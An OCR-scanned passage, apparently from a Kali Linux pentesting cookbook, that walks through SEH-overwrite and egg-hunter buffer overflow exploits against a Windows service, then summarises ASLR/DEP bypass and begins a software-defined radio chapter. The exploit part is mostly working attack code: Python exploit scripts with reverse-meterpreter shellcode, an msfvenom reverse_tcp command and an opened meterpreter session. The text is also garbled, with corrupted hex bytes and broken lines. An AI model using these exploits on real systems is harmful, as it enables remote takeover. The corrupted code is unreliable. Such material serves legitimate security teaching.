Bg®@Bg1Bg2 Bg4Bg5Bg6Bg7Bg8BgSBhOBh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bis5Bi 
6Bi7Bi8Bi9Bj 0Bj 1Bj 2Bj 3Bj 4Bj5Bj 6Bj 7Bj 8Bj SBkOBk 1 Bk2Bk 3Bk4Bk5Bk6Bk7Bk8Bk9B10B1L1B1L2B 
13B14B15B16B17B18B1 9BmOBm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8BmSBnOBn1 Bn2Bn3Bn4Bn5Bn6Bn7BnsBng 
Bo@Bo1Bo2Bo3Bo4Bo5Bo6Bo/7Bo8Bo9BpOBp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8BpSBqeGBq1Bq2Bq3Bq4Baq5Bq 
6Bq7Bq8Bq9Br@Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs/Bs8Bs9Bt OBt1Bt2B 
deep hpenaagie gla i iagelalg loll ela da at liga SByeyesy aye aay By iBN op 


] 9 z1Bz22Bz 3Bz 4Bz 5B2 6Bz 782 BBz 
b3C b4Cb5Cb6Cb7Cb8Cb9CcOCc 1Cc2Cc 3Cc 4Cc5L 





15. The code should be something like this: 


#! /usr/bin/python 
import socket 


target_address="192.168.110.12" 
target_port=6660 


buffer = "USV " 
buffer += 
" \aOAal Aa2Aa3Aa4Aa5Aa6Aa7 AaSAaSAbOAb 1 Ab2Ab3Ab 4AbSAbGAb7AbSAbSACOAC1Ac 


sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
connect=sock.connect((target_address, target_port) ) 
sock.send(buffer) 

print "Sent! !"| 

sock.close() 


16. We now run this file, and in Immunity Debugger, we will see the access violation error. We now go 
to View | SEH chain. 

17. We will see that our SEH has been overwritten with bytes. We copy the 42326742 value and find its 
location using the pattern_offset script in Kali: 





Iddress | SE handler 





| ruby /path/to/script/pattern_offset.rb -q 423267412 


The following screenshot shows the output of the preceding command: 


1 


:/media/sf Downloads/BOOK# /usr/share/metaspLoit - framework/tools/explo 
t/pattern_offset.rb -q 42326742 





[*] Exact match at offset 966 


18. We will see that the offset is 966 bytes at which the handler is overwritten. 
19. Now let's modify our exploit a bit and see what happens. We have oes bytes; we will use 962 bytes of 
As and 4 bytes of breakpoint and 4 with Bs and the rest of the bytes with Cs to see what happens: 


#!/usr/bin/python 

import socket address="192.168.110.12" 

port=6660 buffer = "USV " 

buffert+= "A" * 962 

buffer+= "\xcc\xcc\xcc\xcc" 

buffer+= "BBBB" 

buffer+= "C" * (2504 - len(buffer)) 

buffer+= "\r\n\r\n" 
sock=socket.socket(socket.AF_INET, socket .SOCK_STREAM) 
connect=sock.connect((target_address, target_port) ) 
sock.send(buffer ) 

sock.close() 


20. We run this and view the SEH chain. Here, we will notice an interesting thing: the first 4 breakpoints 
we added have actually overwritten a memory address, and the next 4 have been overwritten into our 
SEH handler: 


nal File View Debug Plugins ImmLib Options 
\O% BR «x d i EH SEL 4 





Address |SE handler 








This happens as the SEH is a pointer that points to the memory address where the code is stored 
when an exception occurs. 


21. Let's pass the exception to the program and we will see that EIP has been overwritten, but when we 
look in the memory, we will see that our Cs have been written approximately 6 bytes after our Bs in 
the memory. We can use a pop ret followed by a short sump code to jump to our shellcode. 


22. We type the !safesen command in the debugger's console: 


20: 


24. 


20; 





Isafeseh 


This will show us the list of all DLLs that are not compiled using saresen/on. In the log window, we 
will see the list of the functions: 


Log data 


SBADFSSD 
SBBADF SSD 
DF SSD 





Let's use a DLL vbajet3z2.a11. Our goal is to find a pop pop ret Sequence in the DLL, that we can use to 
bypass SEH. 


We find our DLL on the Windows machine and copy it to Kali. Kali has another great tool known as 
msfpescan, that can be used to find the pop pop ret Sequence in the DLL: 


/path/to/msfpescan -f vbajet32.d1l -s 


The following screenshot shows the output of the preceding command: 


:/media/sf Downloads/BOOK# /usr/share/framework2/msfpescan -f vbajet32.dll -s 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 
ebx ecx ret 

ebx ret 
ebx ret 
ret 
ret 
ret 
ret 
ret 


26. Here, we have the address for all the pop pop ret Sequences in the .a11. We will use the first one, 
oxofg9aifob. We also need a short sump code, that will cause a jump to our shellcode or Cs stored in the 
memory. 

Short sump is \xeb\xos, where oe is the number of bytes we need to jump. We are still 2 bytes short of 
the 4-byte address space and we can use 2 NOPs. 


Let's create a shellcode; since we are sending this over HTTP, we need to make sure we avoid bad 
characters. We will use msfvenom: 


msfvenom -p windows/meterpreter/reverse_tcp -f py 
-b "\xOO\xfF\x20\x25\x0a\x-d" -v buffer 


The following screenshot shows the output of the preceding command: 


:/media/sf_Downloads/BOOK# msfvenom -p windows/meterpreter/reverse tcp -f py -b "\xOO\xff\xOa\x@d\x20\x25" -v buffer 

No platform was selected, choosing Msf::Module::Platform: :Windows from the payload 
No Arch selected, selecting Arch: x86 from the payload 
mele lee Ma a CmeLe)))|e}-1m Rel M-Ma-lalelele(-Ta-) 
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 
x86/shikata_ga_nai succeeded with size 360 (iteration=0) 
x86/shikata_ga_nai chosen with final size 360 
Payload size: 360 bytes 
Final size of py file: 1843 bytes 
buffer = 2 

er += "\xb8\x52\x62\xd2\xbb\xdd\xc1l\xd9\x74\x24\x f4\x5e" 

r += "\x29\xc9\xb1\x54\x83\xee\x fco\x31\x46\x0f\x03\x46" 

"\x5d\x80\x27\x47\x89\xc6\xc8\xbB\x49\xa7\x41\x5d" 
ne CA hOC-VAO Glob Ohohe Os-hO CoVAb clohb eAohe colohe colon GACRO dol- ie 
"\x5d\xdO\xbc\x9f\xd6\x5F\x9b\xae\xe7\xcc\xdf\xbL" 
AO. 4] RO AChR O IC RO GAD CVAD CRO CURD colCh® ec CAO leh ¢-/oh0 4c) me 
"\x4ce\x49\xle\xb6\x f9\x07\xa3\x3d\xb1\x86\xa3\xa2" 
"\xO1\xa8\x82\x74\xla\x f3\x04\x76\xc F\x8F\x0c\x60" 
"\xOc \xb5\xc7\xlb\xe6\x41\xd6\xcd\x37\xa9\x75\x30" 
"\x F8\x58\x87\x74\x3e\x83\x F2\x8c\x3d\x3e\x05\x4b" 
"\x3c\xe4\x80\x48\xe6\x6 F\x32\xb5\x17\xa3\xa5\x3e" 
"\x1lb\x08\xal\x19\x3f\x8 f\x66\x12\x3b\x04\x89\x f5" 
"\xca\x5e\xae\xd1\x97\xO5\xc F\x40\x7d\xeb\x fO\x93" 
"\xde\x54\x55\xdf\x f2\x81\xe4\x82\x9a\x66\xc5\x3c" 
"\x5a\xel\x5e\x4e\x68\xae tx F4\xd8\xcO\x27\xd3\xlf" 
"\x27\x12\xa3\xbO\xd6\x9d\xd4\x99\x1lco\xc9\x84\xb1" 


+ + 


i 
+ 


29. We will put everything in the exploit, as follows: 





| #!/usr/bin/python 


import socket 

target_address="192.168.110.12" 

target_port=6660 

buffer = "USV " 

buffer += "\x41" * 962 #offset 

# 6 Bytes SHORT jump to shellcode 

buffer += "\xeb\x06\x90\x90" 

# POP+POP+RET Ox0f9a196a 

buffer += "\x6a\x19\x9a\xOFf" 

buffer += "\x90" * 16 

#Shellcode Reverse meterpreter. 

buffer += "\xdb\xde\xd9\x74\x24\xf4\xbFf\xcf\x9F\xb1\x9a\x5e" 
buffer += "\x31\xc9\xb1\x54\x83\xee\xfo\x31\x7e\x14\x03\x7e" 
buffer += "\xdb\x7d\x44\x66\xOb\x03\xa7\x97\xcb\x64\x21\x72" 
buffer += "\xfa\xa4\x55\xf6\xac\x14\x1d\x5a\x40\xde\x73\x4F" 
buffer += "\xd3\x92\x5b\x60\x54\x18\xba\x4f\x65\x31\xfe\xce" 
buffer += "\xe5\x48\xd3\x30\xd4\x82\x26\x30\x11\xfe\xcb\x60" 
buffer += "\xca\x74\x79\x95\x7Ff\xcO\x42\x1e\x33\xc4\xc2\xc3" 
buffer += "\x83\xe7\xe3\x55\x98\xb1\x23\x57\x4d\xca\x6d\x4F" 
buffer += "\x92\xf7\x24\xe4\x60\x83\xb6\x2c\xb9\x6c\x14\x11" 
buffer += "\x76\x9F\x64\x55\xbO\x40\x13\xaf\xc3\xfd\x24\x74" 
buffer += "\xbe\xd9\xa1\x6f\x18\xa9\x12\x54\x99\x7e\xc4\x1F" 
buffer += "\x95\xcb\x82\x78\xb9\xca\x47\xf3\xc5\x47\x66\xd4" 
buffer += "\x4c\x13\x4d\xfO\x15\xc7\xec\xa1\xf3\xa6\x11\xb1i" 
buffer += "\x5c\x16\xb4\xb9\x70\x43\xc5\xe3\xic\xa0\xe4\xib" 
buffer += "\xdc\xae\x7f\x6Ff\xee\x71\xd4\xe7\x42\xfO\xf2\xfoO" 
buffer += "\xa5\xd0\x43\x6e\x58\xdb\xb3\xa6\x9e\x8F\xe3\xdo0" 
buffer += "\x37\xbO\x6f\x21\xb8\x65\xO05\x24\x2e\x46\x72\x48" 
buffer += "\xa5\x2e\x81\x95\xa8\xf2\xOc\x73\x9a\x5a\x5F\x2c" 
buffer += "\x5a\xOb\x1f\x9c\x32\x41\x9O\xc3\x22\x6a\x7a\x6c" 
buffer += "\xc8\x85\xd3\xc4\x64\x3Ff\x7e\x9e\x15\xcO\x54\xda" 
buffer += "\xi15\x4a\x5d\xita\xdb\xbb\x14\x08\xOb\xda\xd6\xd0" 
buffer += "\xcb\x77\xd7\xba\xcf\xd1\x80\x52\xcd\x04\xe6\xfe" 
buffer += "\x2e\x63\x74\xfa\xdO\xf2\x4d\x70\xe6\x60\xf2\xee" 
buffer += "\x06\x65\xf2\xee\x50\xef\xf2\x86\x04\x4b\xal\xb3" 
buffer += "\x4b\x46\xd5\x6Ff\xd9\x69\x8c\xdc\x4a\x02\x32\x3a" 
buffer += "\xbc\x8d\xcd\x69\xbf\xca\x32\xef\x9d\x72\x5b\x0F" 
buffer += "\xa1\x82\x9b\x65\x21\xd3\xf3\x72\x0e\xdc\x33\x7a" 
buffer += "\x85\xb5\x5b\xFA\x4b\x77\xFd\x06\x46\xd9\xa3\x07" 
buffer += "\x64\xc2\xb2\x89\x8b\xf5\xba\x6b\xbO\x23\x83\x19" 
buffer += "\xf1\xf7\xbO\x12\x48\x55\x90\xb8\xb2\xc9\xe2\xe8" 
# NOP SLED 

buffer += "\x90" * (2504 - len(buffer)) 

buffer += "\r\n\r\n" 

sock=socket.socket(socket.AF_INET, socket .SOCK_STREAM) 
connect=sock.connect((target_address, target_port) ) 
sock.send(buffer ) 

print "Sent!!" 

sock.close() 


The following screenshot shows the output of the preceding command: 


#! /usr/bin/python 
import socket 


target_address="192.168.110.12" 
target_port=6660 


buffer = "USV " 

buffer += "\x41" * 962 #offset 

# 6 Bytes SHORT jump to shellcode 

buffer += "\xeb\x06\x90\x90" 

# POP+POP+RET OxOf9al96a 

buffer += "\x6a\x19\x9a\xOf" 

buffer += "\x90" * 24 

#Shellcode Reverse meterpreter. 

buffer += "\xb8\x52\x62\xd2\xbb\xdd\xc1\xd9\x74\x24\ xf 4\xSe" 
buffer += "\x29\xc9\xb1\x54\x83\xee\xfc\x31\x46\xOf \x03\x46" 
buffer += "\x5d\x80\x27\x47\x89\xc6\xc8\xb8\x49\xa7\x41\ x5d" 
buffer += "\x78\xe7\x36\x15\x2a\xd7\x3d\x7b\xc6\x9c\x10\x68" 
buffer += "\x5Sd\xd0\xbc\x9f\xd6\x5Sf\x9b\xae\xe7\xcc\xdf\xb1" 
buffer += "\x6b\xOf\xOc\x12\x52\xcO\x41\x53\x93\x3d\xab\x01" 
buffer += "\x4c\x49\xle\xb6\xf9\x07\xa3\x3d\xb1\x86\xa3\xa2" 
buffer += "\xO1\xa8\x82\x74\xla\xf 3\x04\x76\xcf\x8f\xOc\x60" 
buffer += "\xOc\xbS\xc7\xlb\xe6\x41\xd6\xcd\x37\xa9\x75\ x30" 
buffer += "\xf8\x58\x87\x74\x3e\x83\ xf 2\x8c\x3d\x3e\x05\x4b" 
buffer += "\x3c\xe4\x80\x48\xe6\x6f \x32\xb5\x17\xa3\xa5\x3e" 
buffer += "\xlb\x08\xal\x19\x3f\x8f\x66\x12\x3b\x04\x89\xf5" 
buffer += "\xca\x5e\xae\xd1\x97\x05\xcf\x40\x7d\xeb\xf0\x93" 
buffer += "\xde\x54\x55\xdf\xf2\x81\xe4\x82\ x9a\x66\xc5\x3c" 
buffer += "\xSa\xel\x5e\x4e\x68\xae\xf 4\xd8\xcO\x27\xd3\x1lf" 
buffer += "\x27\x12\xa3\xbO\xd6\x9d\xd4\x99\x1lc\xc9\x84\xb1" 
buffer += "\xbS\x72\x4f\x42\x3a\xa7\xf a\x47\xac\x88\ x53\ x29" 
buffer += "\x2b\x61\xa6\xb6\x22\x2d\x2f \x50\x14\xSd\x7f\xcd" 
buffer += "\xd4\x4d\xcO\xbd\xbc\x87\xcf\xe2\xdc\xa7\x05\x8b" 
buffer += "\x76\x48\ xf 0\xe3\xee\xf 1\xS9\x7F\x8f \xfe\x77\x05" 


30. Let's run this without the debugger this time. We will open our handler in Kali, and we should have 


meterpreter access: 


TCP handler on 192.168.110.7:4444 
load handler... 
5 
i 


Started reverse 
Starting the pa 
Sending stage ( 

ses 


y 
957487 bytes) to 192.168.110.12 

Meterpreter session 3 opened (192.168.110.7:4444 -> 192.168.110.12; 
1380) at 2017-07-14 08:54:54 -0400 


meterpreter > (] 





See also 


© =https://www.corelan.be/index. php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ 


® http://resources.infosecinstitute.com/bypassing-seh-protection-a-real-life-example/ 


Exploiting egg hunters 


Egg hunting is used when there is not enough space in the memory to place our shellcode consecutively. 
Using this technique, we prefix a unique tag with our shellcode and then the egg hunter will basically 
search for that tag in the memory and execute the shellcode. 

The egg hunter contains a set of programming instructions; it is not much different from shellcode. There 
are multiple egg hunters available. You can learn more about them and how they work with this paper by 
skape: http://www.hick. org/code/skape/papers/egghunt-shellcode. pdf. 


Getting ready 


We will try to make an exploit with an egg hunter for the same software we used in the previous recipe. 
The logic behind the exploitation would be something similar to what is shown in the following diagram: 





Junk 
Bytes 


nSEH SEH EGGHUNTER SHELLCODE 





Our aim is to overwrite the nSEH and then SEH in order to make it jump to the egg hunter shellcode, 
which, when executed, will find and execute our shellcode in the memory. 


How to do it... 


Following are the steps that demonstrate the use of the egg hunter: 


1. We start the software on Windows XP and attach it to the debugger: 


Ww 


We already know the crash bytes and the address to bypass the SAFESEH. 
Now we need to add our egg hunter and then use it to jump to our shellcode. 
As we know, the egg hunter is a shellcode and the basic rule for using a shellcode is to make sure it 


Select process to attach 


(o\&) 
ea | 





does not have any bad characters. 
Let's look at the previous exploit we made: 


#!/usr/bin/python 

import socket 
target_address="192.168.110.12" 
target_port=6660 

buffer = "USV " 


buffer 


+= 


# 6 Bytes 


buffer 


+= 


"\x41" * 962 #offset 


SHORT jump to shellcode 


"\xeb\x06\x90\x90" 


# POP+POP+RET Ox0f9a196a 
buffer += "\x6a\x19\x9a\x0f" 
buffer += "\x90" * 16 
#Shellcode Reverse meterpreter. 


buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 
buffer 


+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 
+= 


"\xdb\xde\xd9\x74\x24\xf4\xbf\xcf\x9F\xb1\x9a\x5e" 
"\x31\xc9\xb1\x54\x83\xee\xFo\x31\x7e\x14\x03\x7e" 
"\xdb\x7d\x44\x66\xOb\x03\xa7\x97\xcb\x64\x21\x72" 
"\xfa\xa4\x55\xf6\xac\x14\x1d\x5a\x40\xde\x73\x4Ff" 
"\xd3\x92\x5b\x60\x54\x18\xba\x4f\x65\x31\xfe\xce" 
"\xe5\x48\xd3\x30\xd4\x82\x26\x30\x11\xfe\xcb\x60" 
"\xca\x74\x79\x95\x7 F\xcO\x42\x1e\x33\xc4\xc2\xc3" 
"\x83\xe7\xe3\x55\x98\xb1\x23\x57\x4d\xca\x6d\x4Ff" 
"\x92\xXF7\x24\xe4\x60\x83\xb6\x2c\xb9\x6c\x14\x11" 
"\x76\xX9F\xX64\x55\xbO\x40\x13\xaf\xc3\xFd\x24\x74" 
"\xbe\xd9\xa1l\x6fF\x18\xa9\x12\x54\x99\x7e\xc4\x1F" 
"\x95\xcb\x82\x78\xb9\xca\x47\xf3\xc5\x47\x66\xd4" 
"\x4c\x13\x4d\xfO\x15\xc7\xec\xal\xf3\xa6\x11\xbi" 
"\x5C\x16\xb4\xb9\x70\x43\xc5\xe3\xic\xa0\xe4\x1b" 
"\xdc\xae\x7f\x6Ff\xee\x71\xd4\xe7\x42\xFO\xF2\x FO" 
"\xa5\xd0\x43\x6e\x58\xdb\xb3\xa6\x9e\x8F\xe3\xdo" 
"\x37\xbO\x6F\xX21\xb8\x65\x05\x24\x2e\x46\x72\x48" 
"\xa5\x2e\x81\x95\xa8B\xf2\xOC\x73\x9a\x5a\x5F\x2ce" 
"\x5a\xOb\x1F\x9c\x32\x41\x90\xc3\x22\x6a\x7a\x6c" 
"\xc8\x85\xd3\xc4\x64\x3F\x7e\x9e\x15\xcO\x54\xda" 
"\x15\x4a\x5d\x1a\xdb\xbb\x14\x08\x0b\xda\xd6\xdo" 
"\xcb\x77\xd7\xba\xcf\xd1\x80\x52\xcd\x04\xe6\xfc" 
"\x2e\x63\x74\xfa\xdO\xf2\x4d\x70\xe6\x60\xf2\xee" 
"\xO6\x65\xf2\xee\x50\xef\xF2\x86\x04\x4b\xai\xb3" 


Cancel | 


6. 


ts 


0: 


buffer += "\x4b\x46\xd5\x6f\xd9\x69\x8c\xdc\x4a\x02\x32\x3a" 
buffer += "\xbc\x8d\xcd\x69\xbf\xca\x32\xef\x9d\x72\x5b\x0F" 
buffer += "\xa1\x82\x9b\x65\x21\xd3\xf3\x72\x0e\xdc\x33\x7a" 
buffer += "\x85\xb5\x5b\xFA\x4b\x77\xFfd\x06\x46\xd9\xa3\x07" 
buffer += "\x64\xc2\xb2\x89\x8b\xf5\xba\x6b\xbO\x23\x83\x19" 
buffer += "\xf1\xf7\xbO\x12\x48\x55\x90\xb8\xb2\xc9\xe2\xe8" 
# NOP SLED 

buffer += "\x90" * (2504 - len(buffer)) 

buffer += "\r\n\r\n" 

sock=socket.socket(socket.AF_INET, socket .SOCK_STREAM) 
connect=sock.connect((target_address, target_port) ) 
sock.send(buffer ) 

print "Sent!!" 

sock.close() 


Let's consider that the shellcode isn't actually after the 6 bytes of jump we made in the memory. In 
this situation, we can use an egg hunter to make a reliable exploit for the software. 

Now it may sound easy, but there are some complications. We need our final exploit to follow the 
flow like we mentioned in the diagram, but we also need to make sure we have enough NOPs in the 
code to ensure the exploit. 


This is what our exploit flow should look like, as in our case, we had enough memory to have the 
shellcode. But in other cases, we may not have so much memory, or our shellcode may be stored 
somewhere else in the memory. In those cases, we can go for egg hunting, which we will cover in the 
later recipe: 





Junk 
Bytes nSEH SEH Nop | Egghunter Nop Tag Shellcode 





Following the preceding flow diagram, our shellcode would look something like this: 


#!/usr/bin/python 

import socket 

target_address="192.168.110.12" 

target_port=6660 

#Egghunter Shellcode 32 bytes 

egghunter = "" 

egghunter += "\x66\x81\xca\xff\ xOF\x42\x52\x6a\x02\x58\xcd\ 
x2e\x3c\x05\x5a\x74" 

egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf 
\x75\xe7\xff\xe7" 

# 6 Bytes SHORT jump to shellcode 

nseh = "\xeb\x09\x90\x90" 

# POP+POP+RET O0x0f9a196a 

seh = "\x6a\x19\x9a\x0Ff" 

#Shellcode Reverse meterpreter. 360 bytes 

buffer = "" 

buffer += "\xdb\xde\xd9\x74\x24\xf4\xbFf\xcf\x9F\xb1i\x9a\x5e" 

buffer += "\x31\xc9\xb1\x54\x83\xee\xfo\x31\x7e\x14\x03\x7e" 

buffer += "\xdb\x7d\x44\x66\xOb\x03\xa7\x97\xcb\x64\x21\x72" 

buffer += "\xfa\xa4\x55\xf6\xac\x14\x1d\x5a\x40\xde\x73\x4F" 

buffer += "\xd3\x92\x5b\x60\x54\x18\xba\x4f\x65\x31\xfe\xce" 

buffer += "\xe5\x48\xd3\x30\xd4\x82\x26\x30\x11\xfe\xcb\x60" 

buffer += "\xca\x74\x79\x95\x7Ff\xcO\x42\x1e\x33\xc4\xc2\xc3" 

buffer += "\x83\xe7\xe3\x55\x98\xb1\x23\x57\x4d\xca\x6d\x4F" 

buffer += "\x92\xf7\x24\xe4\x60\x83\xb6\x2c\xb9\x6c\x14\x11" 

buffer += "\x76\x9F\x64\x55\xbO\x40\x13\xaf\ xc3\xfd\x24\x74" 

buffer += "\xbe\xd9\xa1\x6f\x18\xa9\x12\x54\x99\x7e\xc4\x1F" 

buffer += "\x95\xcb\x82\x78\xb9\xca\x47\xf3\xc5\x47\x66\xd4" 

buffer += "\x4c\x13\x4d\xfO\x15\xc7\xec\xa1\xf3\xa6\x11\xb1i" 

buffer += "\x5c\x16\xb4\xb9\x70\x43\xc5\xe3\xic\xa0\xe4\x1b" 

buffer += "\xdc\xae\x7f\x6Ff\xee\x71\xd4\xe7\x42\xfO\xf2\xfoO" 

buffer += "\xa5\xd0\x43\x6e\x58\xdb\xb3\xa6\x9e\x8F\xe3\xdo" 

buffer += "\x37\xbO\x6f\x21\xb8\x65\xO05\x24\x2e\x46\x72\x48" 

buffer += "\xa5\x2e\x81\x95\xa8\xf2\xOc\x73\x9a\x5a\x5F\x2c" 


buffer += "\x5a\xOb\x1f\x9c\x32\x41\x9O\xc3\x22\x6a\x7a\x6c" 
buffer += "\xc8\x85\xd3\xc4\x64\x3Ff\x7e\x9e\x15\xcO\x54\xda" 
buffer += "\xi5\x4a\x5d\xita\xdb\xbb\x14\x08\x0b\xda\xd6\xd0" 
buffer += "\xcb\x77\xd7\xba\xcf\xd1\x80\x52\xcd\x04\xe6\xfe" 
buffer += "\x2e\x63\x74\xfa\xdO\xf2\x4d\x70\xe6\x60\xf2\xee" 
buffer += "\xO06\x65\xf2\xee\x50\xef\xf2\x86\x04\x4b\xal\xb3" 
buffer += "\x4b\x46\xd5\x6Ff\xd9\x69\x8c\xdc\x4a\x02\x32\x3a" 
buffer += "\xbc\x8d\xcd\x69\xbf\xca\x32\xef\x9d\x72\x5b\x0F" 
buffer += "\xa1\x82\x9b\x65\x21\xd3\xf3\x72\x0e\xdc\x33\x7a" 
buffer += "\x85\xb5\x5b\xFA\x4b\x77\xFd\x06\x46\xd9\xa3\x07" 
buffer += "\x64\xc2\xb2\x89\x8b\xf5\xba\x6b\xbO\x23\x83\x19" 
buffer += "\xf1\xf7\xbO\x12\x48\x55\x90\xb8\xb2\xc9\xe2\xe8" 
nop = "\x90" * 301 

tag = "woO0twoot" 

bufferi = "USV " 

bufferi += nop * 2 + "\x90" * 360 

bufferi += nseh + seh # 8 

bufferit += "\x90" * 6 # 

bufferi += egghunter 

bufferi += nop 

buffer1 += tag 

bufferi += buffer 

buffert += "\x90" * (3504 - len(buffer)) 

buffera += "\r\n\r\n" 

sock=socket.socket(socket.AF_INET, socket .SOCK_STREAM) 
connect=sock.connect((target_address, target_port) ) 
sock.send(buffer1) 

print "Sent!!" 

sock.close() 


10. We go ahead and save it as script.py and run it using python script.py. 
11. And, we should have our meterpreter session waiting for us. 


The exploit code we wrote may not work in the exact same way on every system because 
there are multiple dependencies depending on the OS version, software version, and so 
on. 


See also 


@ =https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-e gg-hunting/ 
® http://www.fuzzysecurity.com/tutorials/expDev/4.html 


An overview of ASLR and NX bypass 


Address Space Layout Randomization (ASLR) was introduced in 2001 by PaX project as a Linux 
patch and was integrated into Windows Vista and later OS. It is a memory protection that protects against 
buffer overflows by randomizing the location where executables are loaded in the memory. Data 
Execution Prevention (DEP) or no-execute (NX) was also introduced with Internet Explorer 7 on 
Windows Vista, and it helps prevent buffer overflows by blocking code execution from the memory, 
which is marked as non-executable. 


How to do it... 


We need to first evade ASLR. There are basically two ways in which ASLR can be bypassed: 


1. 


We look for any anti- ASLR modules being loaded in the memory. We will have the base address of 
any module at a fixed location. From here, we can use the Return Oriented Programming (ROP) 
approach. We will basically use small parts of code followed by a return instruction and chain 
everything to get the desired result: 


Che New Bi 
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Source: https://www.slideshare.net/dataera/remix-ondemand-live-randomization-finegrained-live-aslr-during-runtime 





. We get pointer leak/memory leak here, and we adjust the offset to grab the base address of the 


module whose pointer gets leaked. 

Next, we need to bypass the NX/DEP. To do this, we use a well-known ret-to-libc attack (in Linux) 
or ROP chaining (in Windows).This method allows us to use 1ibc functions to perform the task we 
would have done with our shellcode. 

There's another method used for bypassing ASLR in 32-bit systems since 32 bit is a comparatively 
small address space compared to 64-bit systems. This makes the range of randomization smaller and 
feasible to brute force. 

This is pretty much the basic concept behind bypassing ASLR and DEP. There are many more 
advanced ways of writing exploits, and as the patches are applied, every day new methods are 
discovered to bypass those. 


See also 


https://www.trustwave.com/Resources/SpiderLabs-Blog/Baby-s-first-N X-ASLR-bypass/ 

http://taishi8117. github. io/2015/11/11/stack-bof-2/ 

https://www.exploit-db.com/docs/17914. pdf 
http://tekwizz123.blogspot.com/2014/02/bypassing-aslr-and-dep-on-windows-7. html 

https://www.corelan.be/index. php/2010/06/16/exploit-writing-tutorial-part- 10-chaining-dep-with-rop-the-rubikstm-cube/ 


Playing with Software-Defined Radios 


In this chapter, we will cover the following recipes: 


e Introduction to radio frequency scanners 
Hands-on with RTLSDR scanner 

Playing around with gqrx 

Kalibrating device for GSM tapping 
Decoding ADS-B messages with Dump1090 


Introduction 


The term software-defined radio means, implementation of hardware-based radio components such as 
modulators, demodulators and tuners using a software. In this chapter we will cover different recipes and 
look at multiple ways on how RTLSDR can be used to play around with frequencies and the data being 
transported through it. 


Radio frequency scanners 


RTLSDR is a very cheap (around 20 USD) software-defined radio that uses a DVB-T TV tuner dongle. In 
this recipe, we will cover connecting an RTLSDR device with Kali Linux to test whether it was detected 
successfully. 


Getting ready 


We will need some hardware for this recipe. It's easily available for purchase from Amazon or from https:// 
www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/. Kali already has tools for us to get going with it. 


How to do it... 


We connect our device and it should be detected in Kali Linux. It's common for the devices to behave 
inaccurately. Here is the recipe to run the test: 


1. We will first run the test using the command: 


| rtl_test 


The following screenshot shows the output of the preceding command: 


i~# rtl_test 
Found 1 device(s): 
@: Realtek, RTL2838UHIDIR, SN: 00000001 


[Using device 0: Generic RTL2832U OEM 

Found Rafael Micro R820T tuner 

Supported gain values (29): 0.0 0.9 1.4 2.7 3.7 7.7 8.7 12.5 14.4 15.7 16.6 19.7 
20.7 22.9 25.4 28.0 29.7 32.8 33.8 36.4 37.2 38.6 40.2 42.1 43.4 43.9 44.5 48.0 

| 49.6 

| [R82XX] PLL not locked! 

|Sampling at 2048000 S/s. 


Info: This tool will continuously read from the device, and report if 
get Lost. If you observe no further output, everything is fine. 


samples in async mode... 
least 16 bytes 
least 60 bytes 
least 60 bytes 
least 60 bytes 
least 128 bytes 
least 196 bytes 





2. We may see some packet drops. This is because of trying this ina VM setup with only USB 2.0. 


3. Incase there are a lot of packet drops, we can test it by setting a lower sampling rate with rti_test -s 
10000000: 


:~# rtl_test -s 1000000 
Found 1 device(s): 
Q@: Realtek, RIL2838UHIDIR, SN: G0000001 


[Using device @: Generic RTL2832U OEM 

Found Rafael Micro R820T tuner 

Supported gain values (29): 0.0 0.9 1.4 2.7 3.7 7.7 8.7 12.5 14.4 15.7 16.6 19.7 
20.7 22.9 25.4 28.0 29.7 32.8 33.8 36.4 37.2 38.6 40.2 42.1 43.4 43.9 44.5 48.0 
49.6 

lExact sample rate is: 1000000.026491 Hz 

[R82XX] PLL not Locked! 

[Sampling at 1000000 S/s. 


Info: This tool will continuously read from the device, and report if 
samples get Lost. If you observe no further output, everything is fine. 
| 





4. Now, we are all set to move on to the next recipe and play around with our device. 


Hands-on with RTLSDR scanner 


RTLSDR scanner is a cross-platform GUI that can be used for spectrum analysis. It will scan the given 
frequency range and display the output in a spectrogram. 


How to do it... 


Here is the recipe to rum rtlsdr-scanner: 


1. We connect RTLSDR to the system and start the scanner using the command: 


| rtlsdr-scanner 


The following screenshot shows the output of the preceding command: 


:~# rtlsdr-scanner 
RTLSDR Scanner 


Found Rafael Micro R820T tuner 
[R82XX] PLL not Locked! 
/usr/Lib/python2.7/dist -packages/matpLotlib/cbook .py:136: MatplotlLibDeprecationW 
arning: The axisbg attribute was deprecated in version 2.0. Use facecolor instea 
d. 

warnings.warn(message, mplLDeprecation, stacklevel=1) 
/usr/lib/python2.7/dist -packages/matplotlib/cbook .py:136: MatplotlLibDeprecationW 
arning: idle event is only implemented for the wx backend, and will be removed i 
n matplotlib 2.1. Use the animations module instead. 

warnings.warn(message, mplDeprecation, stacklevel=1) 
05:52:24: Debug: ScreenToClient cannot work when toplevel window is not shown 
05:52:24: Debug: ScreenToClient cannot work when toplevel window is not shown 
05:52:24: Debug: ScreenToClient cannot work when toplevel window is not shown 


(rtlsdr_scan.py:6254) : Gdk-WARNING **: gdk window_set_icon_list: icons too large 
05:52:24: Debug: ScreenToClient cannot work when toplevel window is not shown 


(rtlsdr_scan.py:6254) : Gdk-WARNING : gdk_ window _set_icon_ list: icons too large 





